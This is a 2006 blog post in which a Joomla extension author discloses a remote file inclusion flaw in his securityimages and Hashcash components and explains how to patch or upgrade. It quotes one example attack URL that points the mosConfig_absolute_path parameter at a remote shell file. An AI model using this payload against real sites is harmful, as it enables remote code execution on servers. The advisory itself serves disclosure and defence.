Select Page

Security risk in securityimages

Posted by | Aug 1, 2006 | | 0 |

Security risk in securityimages
| joomla securityimages

The webmaster of janwiersma.com sent me an email today
at 6:12AM , his server was hacked because of a bug in
securityimages. This bug allows a remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5

Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/

In fact I forget to use that line in these files:
defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’);
This avoid any requests to access directly this file. 

– upgrade to 3.0.6 (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

Please also contact all Your friends which are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

– upgrade to 1.2.2  (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

JoomlaCloud is NOT affected

YOU ARE ALL URGE TO UPGRADE ASAP!

You Might Also Like:

OpenComment 3.0.21

New Project: joomlacloud at joomla.org

Module Smugmug slideshow for Joomla! 1.6

Rate:

About The Author

Cédric Walter

I worked with various Insurances companies across Switzerland on online applications handling billion premium volumes. I love to continuously spark my creativity in many different and challenging open-source projects fueled by my great passion for innovation and blockchain technology.In my technical role as a senior software engineer and Blockchain consultant, I help to define and implement innovative solutions in the scope of both blockchain and traditional products, solutions, and services. I can support the full spectrum of software development activities, starting from analyzing ideas and business cases and up to the production deployment of the solutions.I'm the Founder and CEO of Disruptr GmbH.

Related Posts

Preventing SQL Injection Attacks on your Joomla! Websites

Preventing SQL Injection Attacks on your Joomla! Websites

November 12, 2008

Using PHPUnit to test-develop Joomla extensions in PhpStorm

Using PHPUnit to test-develop Joomla extensions in PhpStorm

August 17, 2012

Contest – Win a book PacktPub “Joomla! 1.5 Site Blueprints”

Contest – Win a book PacktPub “Joomla! 1.5 Site Blueprints”

September 14, 2010

Running Joomla! on Synology NAS

Running Joomla! on Synology NAS

November 11, 2011

Categories